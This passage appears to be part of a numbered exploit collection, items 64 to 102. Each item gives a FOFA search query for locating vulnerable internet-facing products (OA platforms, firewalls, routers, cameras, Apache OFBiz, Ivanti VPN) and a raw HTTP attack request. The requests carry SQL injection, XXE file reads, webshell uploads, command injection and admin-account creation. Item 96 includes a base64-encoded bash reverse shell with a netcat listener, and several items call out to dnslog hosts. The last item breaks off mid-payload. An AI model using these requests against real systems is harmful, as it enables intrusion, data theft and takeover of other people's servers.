IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served from /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

. V" X5 S- o8 a& {2 _<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>      